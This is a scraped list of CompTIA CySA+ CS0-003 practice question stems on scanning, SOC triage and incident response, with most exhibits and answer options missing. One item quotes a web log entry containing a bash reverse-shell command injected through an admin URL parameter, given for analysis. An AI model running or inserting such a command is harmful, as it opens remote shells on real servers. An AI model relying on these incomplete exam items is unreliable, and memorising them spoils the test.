COMPTIA-CYSA

CompTIA's CS0-003 An analyst finds that duplicate entries may exist in the asset inventory, which is skewing vulnerability scan data. Which of the following is the best way for the analyst to improve the effectiveness of the vulnerability scan?

CompTIA's CS0-003 A user is flagged for consistently consuming a high volume of network bandwidth over the past week. During the investigation, the security analyst finds traffic to the following websites:Which of the following data flows should the analyst investigate first? E. translate.google.com F. office.com

CompTIA's CS0-003 After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following steps of the cyber kill chain has this attack completed?

CompTIA's CS0-003 A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Choose two.) E. IoCs F. npm identifier

CompTIA's CS0-003 Security analysts can review the Windows Registry on endpoints to get insights into:

CompTIA's CS0-003 An analyst notices that logs contain multiple events for computer account changes during monthly patch maintenance windows, resulting in a flood of tickets. The events generated are from the same system and time frame. The analyst determines that these tickets could be closed without human interaction. Which of the following is the best tool for automatically closing tickets containing the same information?

CompTIA's CS0-003 A security administrator is tasked with modifying the vulnerability scan process to reduce the network traffic but maintain thorough checks. Which of the following scanning approaches should be implemented?

CompTIA's CS0-003 A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential information. Which of the following best describes this security issue?

CompTIA's CS0-003 A group of hacktivists has breached and exfiltrated data from several of a bank’s competitors. Given the following network log output:Which of the following represents the greatest concerns with regard to potential data exfiltration? (Choose two.) E. 5 F. 6 G. 7

CompTIA's CS0-003 The SOC team reestablishes user access after a threat actor successfully performed a business account compromise in which the attacker revoked the legitimate user's access. The following logs are provided to a SOC analyst:Which of the following did the threat actor most likely use during the compromise?

CompTIA's CS0-003 The security team reviews a web server for XSS and runs the following Nmap scan:Which of the following most accurately describes the result of the scan?

CompTIA's CS0-003 Which of the following is the best authentication method to secure access to sensitive data?

CompTIA's CS0-003 An organization adds an MSSP to supplement its security monitoring operations during weekends and holidays. Which of the following would best demonstrate procurement value to the Chief Information Security Officer?

CompTIA's CS0-003 The most recent vulnerability scan results show the following:The vulnerability team learned the following from the asset owners:• Server HQFIN01 is a financial transaction database server used in the company's largest business unit.• Server HQADMIN02 is utilized by an end user with administrator privileges to several critical applications.• No compensating controls exist for either issue.Which of the following would the vulnerability team most likely do to determine remediation prioritization?

CompTIA's CS0-003 A company’s policy is to follow NIST standards and use strong encryption to avoid disclosure of sensitive information in transit between any systems. An analyst reviews a lab web server and receives the following outputs:Which of the following should the analyst identify as the most concerning? E. TLS compression is disabled.

CompTIA's CS0-003 The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point?

CompTIA's CS0-003 A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?

CompTIA's CS0-003 After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the following did the change management team fail to do?

CompTIA's CS0-003 Which of the following does a security policy do?

CompTIA's CS0-003 A vulnerability scan shows the following vulnerabilities in the environment:At the same time, the following security advisory was released:"A zero-day vulnerability with a CVSS score of 10 may be affecting your web server. The vendor is working on a patch or workaround."Which of the following actions should the security analyst take first?

CompTIA's CS0-003 Which of the following threat-hunting concepts is most concerned with identifying the behaviors of the bad actor?

CompTIA's CS0-003 Which of the following best explains the importance of playbooks for incident response teams?

CompTIA's CS0-003 Alerts from the security dashboard are reporting a cloud-based host is suspected to be corrupt. The OS is not loading. The initial investigation concludes that the OS files were modified. Which of the following security controls provided the report?

CompTIA's CS0-003 A company received a shipment of new network switches. Immediately after installing the switches, a security analyst notices suspicious traffic coming from one of the new switches. Which of the following best describes the threat actor?

CompTIA's CS0-003 Which of the following best describes the benefit of implementing a PAM solution?

CompTIA's CS0-003 Several users received a phishing email containing a malicious file that bypassed the organization’s email security tool. Based on the SIEM logs, users did not open the file within the environment. In which of the following phases of the MITRE ATT&CK framework was the attack stopped?

CompTIA's CS0-003 During the triage of a SIEM alarm, a security analyst identifies the following activity on a .bash_history file:Which of the following actions should the analyst take?

CompTIA's CS0-003 Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions?

CompTIA's CS0-003 A security analyst identifies the following log entry in the web server logs:10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -Which of the following best explains the log entry?

CompTIA's CS0-003 A security analyst receives an alert with the following packet capture:Which of the following conclusions should the analyst reach about this incident?